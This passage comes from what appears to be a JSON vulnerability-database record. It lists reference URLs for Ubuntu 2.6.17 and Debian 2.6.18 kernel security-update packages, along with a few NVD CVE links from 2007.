        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-13etch1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-i386_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-ia64_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2172"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-13etch1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390-tape_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1353"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-hppa_2.6.18.dfsg.1-13etch1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2453"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb"
      },
      {
